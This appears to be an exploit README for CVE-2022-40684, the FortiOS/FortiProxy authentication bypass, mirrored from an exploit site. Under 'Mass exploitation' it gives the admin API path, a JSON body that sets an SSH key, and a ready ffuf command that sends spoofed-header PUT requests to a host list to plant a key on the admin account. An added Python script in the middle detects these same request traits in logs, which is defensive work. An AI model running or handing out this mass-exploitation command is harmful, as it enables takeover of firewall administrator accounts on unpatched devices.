## https://sploitus.com/exploit?id=D01BC477-0705-586F-B306-8F6B6D7B89FE
# CVE-2022-40684-POC
FortiProxy / FortiOS Authentication bypass

## Mass exploitation

```/api/v2/cmdb/system/admin/<username>```


```{"ssh-public-key1": "<your-id_rsa.pub>"}```

```
ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=โ€[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r
```

Happy hunting!
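
For defenders, the request above leaves recognizable traces. The following is an added example, not part of the original README or of any Fortinet tooling: it triages HTTP request logs for the traits visible in that command. It assumes JSON-lines logs from a proxy or WAF in front of the management interface; the field names `src`, `method`, `path`, `headers` and `body` are hypothetical, and it generalizes from `PUT` to other write methods.

```python
import json
import re

# Request traits taken from the README's command; log field names are assumed.
ADMIN_PATH = re.compile(r"^/api/v2/cmdb/system/admin/[^/?]+", re.I)
SSH_KEY = re.compile(r'"ssh-public-key\d"\s*:')
WRITE_METHODS = {"PUT", "POST", "PATCH", "DELETE"}  # the README uses PUT

def indicators(rec):
    """Return the set of CVE-2022-40684 request traits present in one record."""
    hdrs = {k.lower(): str(v) for k, v in (rec.get("headers") or {}).items()}
    hits = set()
    if (str(rec.get("method", "")).upper() in WRITE_METHODS
            and ADMIN_PATH.match(str(rec.get("path", "")))):
        hits.add("admin-object-write")
    if hdrs.get("user-agent", "").strip().lower() == "report runner":
        hits.add("ua-report-runner")
    # A remote peer claiming loopback in Forwarded matches the README's header.
    if "127.0.0.1" in hdrs.get("forwarded", "") and rec.get("src") != "127.0.0.1":
        hits.add("forwarded-loopback-from-remote")
    if SSH_KEY.search(str(rec.get("body") or "")):
        hits.add("ssh-key-change")
    return hits

def scan(lines):
    """Return a list of (line_no, src, severity, traits) for suspicious records."""
    findings = []
    for n, line in enumerate(lines, 1):
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(rec, dict):
            continue
        hits = indicators(rec)
        if "admin-object-write" in hits and len(hits) >= 2:
            findings.append((n, rec.get("src"), "high", sorted(hits)))
        elif hits & {"ua-report-runner", "forwarded-loopback-from-remote"}:
            findings.append((n, rec.get("src"), "review", sorted(hits)))
    return findings

# Constructed sample records (documentation address ranges), not real traffic.
ADMIN = "/api/v2/cmdb/system/admin/admin"
SAMPLE = [json.dumps(r) for r in [
    {"src": "198.51.100.10", "method": "GET", "path": "/", "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
    {"src": "203.0.113.7", "method": "PUT", "path": ADMIN, "headers": {"User-Agent": "Report Runner", "Forwarded": 'for="[127.0.0.1]:8000"'}, "body": '{"ssh-public-key1": "PLACEHOLDER"}'},
    {"src": "198.51.100.10", "method": "PUT", "path": ADMIN, "headers": {"User-Agent": "Mozilla/5.0"}, "body": '{"comments": "rotated"}'},
    {"src": "203.0.113.7", "method": "GET", "path": ADMIN, "headers": {"User-Agent": "Report Runner"}, "body": ""},
]] + ['{"src": "truncated']
```

A `high` finding on an unpatched device means the admin account's SSH keys should be checked against the known-good configuration.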

### Requirements
[ffuf](https://github.com/ffuf/ffuf)
Thanks [@joohoi](https://github.com/joohoi)!

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)